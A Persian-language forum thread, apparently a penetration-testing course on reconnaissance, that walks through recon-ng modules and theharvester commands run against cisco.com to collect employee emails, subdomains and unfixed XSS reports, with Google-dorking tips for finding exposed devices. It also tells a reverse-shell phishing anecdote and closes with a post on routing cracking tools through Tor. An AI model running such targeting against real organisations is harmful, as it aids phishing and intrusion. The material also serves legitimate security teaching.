وبسایت آلوده ای میکند که در آن مجموعه تمبرهای مورد علاقه وی در معرض فروش قرار داده شده بود. دقیقا زمانی که او در حال گشت و گذار در وب سایت بود، اکسپلویت مورد نظر بر روی سیستم هدف دانلود و اجرا شده و در نهایت از آن سیستم یک ارتباط شل معکوس (reverse shell) در اختیار هکر گذاشته بود. دیدید که به چه راحتی و با کمترین اطلاعاتی هکر توانست به سیستم هدف خود نفوذ پیدا کند. در واقع این مثال نمونه خوبی بود که بیان میکرد که حتی اطلاعاتی مانند بیان مشکلات شخصی یک فرد به همراه ایمیل شرکتی آن که ممکن است بی ضرر و بی ارزش به نظر برسد، در نهایت منجر به یک نفوذ موفق به سیستم شرکتی آن شخص شد.بله دوستان. همانطور که دیدید، جمع آوری اطلاعات در تست نفوذ یکی از مهمترین فازهای موجود است. این که قبل از حمله هدف خود را بشناسید، درصد احتمال موفقیت شما را افزایش خواهد داد. در مثال بالا یک پست پیش پا افتاده و بی ارزش فروم، توانست کلیدی برای یک حمله موفق باشد.
  22. ابزار Recon-ng را میتوان در واقع یک فریم ورک شناسایی وب با تمام قابلیت های ممکن تعریف کرد که به زبان Python نوشته شده است. این ابزار از لحاظ ماژول های مستقل، کامل است، از طریق دیتابیس فعالیت میکند، عملکرد آن بصورت پیش فرض پیچیده نیست، help قوی ای دارد و در نهایت از لحاظ دستوری و خط فرمان در مرحله بالایی قرار دارد. وجود تمام این قابلیت ها باعث شده است تا ابزار Recon-ng محیطی قدرتمند را که در آن عمل شناسایی بر پایه وب و بصورت متن باز صورت میپذیرد، ایجاد نماید. ظاهر این ابزار و حسی که در کار کردن به کاربر میدهد بسیار شبیه به فریم ورک Metasploit است. اجازه بدهید تا با استفاده از ابزار Recon-ng بسرعت لیستی از داده های مورد نظرمان را جمع آوری نماییم. کار را با استفاده از ماژول whois-poc شروع میکنیم تا در خروجی بما نام کارمندان و آدرس ایمیل آن ها را در شرکت سیسکو بما بدهد. root@kali:~# recon-ng [recon-ng][default] > use recon/contacts/gather/http/api/whois_pocs [recon-ng][default][whois_pocs] > show options Name Current Value Req Description -------- ------------------ ----- --------------- DOMAIN yes target domain [recon-ng][default][whois_pocs] > set DOMAIN cisco.com DOMAIN => cisco.comrecon-ng [recon-ng][default][whois_pocs] > run [*] URL: http://whois.arin.net/rest/pocs;domain=cisco.com [*] URL: http://whois.arin.net/rest/poc/GAB42-ARIN [*] Gary Abbott (gabbott@cisco.com) – whois contact (Concord, TN – United States) … در مرحله بعد میتوانیم با استفاده از recon-ng سورس هایی مانند xssed را برای یافتن آسیب پذیری های XSS که تا کنون گزارش شده اند اما هنوز روی دامین cisco.com این آسیب پذیری ها رفع نشده است، را جستجو کنیم. Recon-ng > use recon/hosts/enum/http/web/xssed Recon-ng [xssed] > set DOMAINcisco.com DOMAIN => cisco.com Recon-ng [xssed] > run [*] URL: http://xssed.com/search?key=cisco.com [*] Mirror: http://xssed.com/mirror/76478/ [*] Domain: www.cisco.com [*] URL: http://www.cisco.com/survey/exit.html?http://xssed.com/ [*] Date published: 16/02/2012 [*] Category: redirect [*] Status: UNFIXED همچنین میتوانیم با استفاده از ماژول google-site دامین های زیر مجموعه بیشتری از cisco.com را بدست آوریم: Recon-ng > use recon/hosts/gather/http/web/google_site Recon-ng [google_site] > set DOMAIN cisco.com DOMAIN => cisco.com Recon-ng [google_site] > run [*] URL: http://www.google.com/search?start=0&filter=0&q=site%3Acisco.com [*] www.cisco.com [*] supportforums.cisco.com [*] learningnetwork.cisco.com [*] newsroom.cisco.com [*] connectedlearninggexchange.cisco.com [*] blogs.cisco.com [*] socialmedia.cisco.com [*] socialviewing.cisco.com [*] meraki.cisco.com برای نمونه میتوان از ماژول ip_neighbour هم نام برد. این ماژول سعی میکند تا آدرس های IP نزدیک دامین هدف را شناسایی کند که در این فرآیند احتمال شناسایی دامین های دیگری نیز وجود دارد. Recon-ng > use recon/hosts/gather/http/web/ip_neighbour Recon-ng [ip_neighbour] > set SOURCE cisco.com SOURCE => cisco.com Recon-ng [ip_neighbour] > run [*] URL: http://www.my-ip-neighbours.com/?domain=cisco.com [*] 72.163.4.161 [*] allgrosys.com [*] apps.cisco.com [*] Broadware.com [*] cisco-returns.com [*] cisco.ag [*] cisco.com [*] cisco.com.akadns.net [*] Cisco.com.az [*] cisco.com.do [*] cisco.com.kz [*] cisco.com.ru [*] cisco.hm بیشتر ماژول ها در ابزار recon-ng به API key هایی نیاز دارند که باید از طرف سرویس دهنده هایشان تهیه شود. همانطور که دیدید کار کردن با ابزار recon-ng سخت نیست و قطعا اگر زمانی را برای کار کردن با ماژول های مختلف آن کنار بگذارید، با تسلط خواهید توانست کارهای بزرگی را با آن انجام دهید.
  23. Email Harvesting روشی موثر و کارا در پیدا کردن ایمیل‌ها و احتمالا یوزرنیم‌های متعلق یک شرکت است. این ایمیل‌ها در بسیاری از موارد مفید هستند و بکار میآیند، برای نمونه میتوان به ایجاد لیستی بالقوه برای حملات Client side، نشان دادن قواعد نامگذاری در شرکت یا الگو برداری از موقعیت کاربران اشاره کرد. یکی از ابزاری که با استفاده از آن میتوان در لینوکس کالی اقدام به Email Harvesting نمود، ابزار "theharvester" است. با استفاده از این ابزار میتوان سایت هایی چون Google، Bing و دیگر سایت های مشابه را توسط الگوهای عبارتی زیر، بدنبال آدرس های ایمیل گشت. root@kali:~# theharvester –d cisco.com –b google >google.txt root@kali:~# theharvester –d cisco.com –l 10 –b bing >bing.txt این ابزار برای کمک به اجراکنندگان تست نفوذ در همان مراحل ابتدایی تست نفوذ طراحی و در نظر گرفته شده است تا بتوان بوسیله آن ردپای مشتری مورد نظر (هدف) را در اینترنت جستجو کرد. این ابزار همچنین برای کسانی مفید است که تمایل دارند که بدانند هکرها درباره شرکت آن ها در اینترنت چه چیزهایی را پیدا میکنند. از قابلیت های جانبی این ابزار میتوان به جمع آوری host ها، نام کارمندان، پورت های باز و هدرها از سورس های عمومی مانند موتورهای جستجو، سرورهای PGP key و دیتابیس SHODAN، اشاره کرد.
  24. جمع آوری اطلاعات از وب هنگامی که بدنبال جمع آوری اطلاعات در باره هدف خود هستید، همیشه استفاده از وب، اولین و ساده ترین روش مورد استفاده شما خواهد بود؛ بنابراین نیاز دارید تا زمانی را جهت جستجوی اطلاعات غیرعمومی از شرکت هدف خود برای وبگردی، کنار بگذارید. اینکه آن ها چکاری انجام میدهند؟، چگونگی با دنیای اطراف خود تعامل دارند؟، آیا واحد فروش دارند؟، آیا آن ها نوبت استخدامی دارند؟، زیر و رو کردن سایت شرکت و جستجو برای اطلاعات عمومی مانند اطلاعات تماس، شماره های تلفن و فکس، ایمیل ها، ساختار شرکت و نظایر آن، همه و همه نمونه اطلاعات مفیدی هستند که بصورت موردی نیز میتوانند درصد موفقیت شما را بالاتر ببرند. برای این کار علاوه بر زیر و رو کردن سایت شرکت که در بالا گفته شد، باید بدنبال سایت هایی باشید که به سایت هدف لینک هستند و یا ایمیل های شرکتی که در گوشه و کنار وب بصورت موردی پراکنده اند را بیابید. خوشبختانه امروزه با استفاده از ابزار موتور جستجوگر گوگل و امکانات جانبی آن میتوانیم بخش اعظمی از این اطلاعات را (در صورت وجود) بصورت متمرکز از گوگل تخلیه اطلاعاتی نماییم. گوگل همانطور که گفته شد، میتوان موتور جستجوی گوگل را بهترین دوستمان در زمینه ردیابی امنیتی دانست خصوصا آن که از آن جهت جمع آوری اطلاعات نیز بخواهیم استفاده کنیم. تخلیه اطلاعاتی با گوگل گوگل استفاده از اپراتورهای مختلف جستجویش را در دسترس عموم قرار داده است که به کاربر این توانایی را میدهد تا با محدود کردن نتایج جستجو، دقیقا به آن چیزی برسد که میخواهد. برای مثال، اپراتور "site"، نتیجه جستجوی گوگل را به یک دامین خاص، محدود میکند. در اینصورت یک جستجوی ساده اطلاعات مفیدی را در اختیار ما قرار خواهد داد. به عنوان نمونه، بگویید که قصد دانستن وجود وب سایت های احتمالی یک شرکت را دارید. در مثال بالا، ما از پارامتر "site" برای محدود کردن نتایج گوگل در نمایش دامین هایی با نام "Microsoft.com" استفاده کردیم. همانطور که در شکل هم اشاره شده است، در این زمان خاص، گوگل حدود 67 میلیون صفحه را با نام دامین "Microsoft.com" ایندکس کرده است. توجه کنید که مقدار قابل توجهی از این رقم نشان دهنده لینک های موجود برای دامین زیر مجموعه "www.Microsoft.com" هستند. بنابراین ف/ی/ل/ت/ر زیر را اعمال میکنیم تا بدانیم که علاوه بر دامین زیر مجموعه "www.Microsoft.com" چه دامین هایی زیر مجموعه دیگری نیز در "Microsoft.com" وجود دارند. این دو جستجو و در واقع درخواست ساده، گوشه ای از اطلاعات پس زمینه در رابطه با دامین "Microsoft.com" ، مثل دامین های زیر مجموعه قابل دسترس آن را بما نشان داد.همین کار را میتوان با با اپراتورهای دیگر جستجو مانند "filetype"، "inurl" و "intitle" که همگی آن ها در پیدا کردن اطلاعات مربوط به شرکت هدف نقش بزرگی دارند، انجام داد. برای مثال یک سیستم مدار بسته و امنیتی معمولی از اتاق سرور، چنین صفحه پیش فرضی دارد: به عنوان (title) صفحه این سیستم امنیتی اتاق سرور دقت کنید که در آن علاوه بر برند مورد استفاده در این سامانه مداربسته (Netbotz Appliance)، به مدل آن نیز اشاره شده است. با چنیدن جستجوی ساده گوگل، میتوانیم نتایج را دقیقا محدود به این دیوایس ها نماییم. نمونه برند و مدل های خاصی نظیر آنچه که در مثال بالا بیان شد، بطور طبیعی در حال تغییرند و در چندین ماه بعد ممکن است چنین محصولی با مشخصات مثال زده شده نتیجه ای را برای شما در بر نداشته باشد. بهرحال مفهوم این نوع جستجوها یکسان است. اگر شما به کارایی اپراتورهای مختلف جستجوی گوگل واقف هستید و میدانید که دقیقا بدنبال چه میگردید، تقریبا میتوانید هر چیزی را در دنیای وب پیدا کنید. در قسمت بعد قصد داریم تا جزئیات زیرتر و بیشتری را در این باره خدمت شما بیان کنیم.
  25. owl

    Miscellaneous

    ابتدا تور را دانلود و نصب نمیایید برای دانلود از لینک زیر دانلود نمایید tor] بعد از دانلود کردن نصب و راه اندازی کنید بعد از اینکه تور فعال شد وارد fire fox شوید و به قسمت پراکسی رفته و ایپی 127.0.0.1 را بنویسید و سیو کنید الان تور بر روی فایر فاکس شما متصل خواهد شد میتوانید به سایت های onion بدون دردسر بروید اگر برای تلگرام میخواهید استفاده کنید به جای پروکسی ایپی 127.0.0.1 استفاده کنید اگر برای کرک میخواهید استفاده کنید کافیه پروکسی 127.0.0.1 را به کرکر خود اضافه کنید باتشکر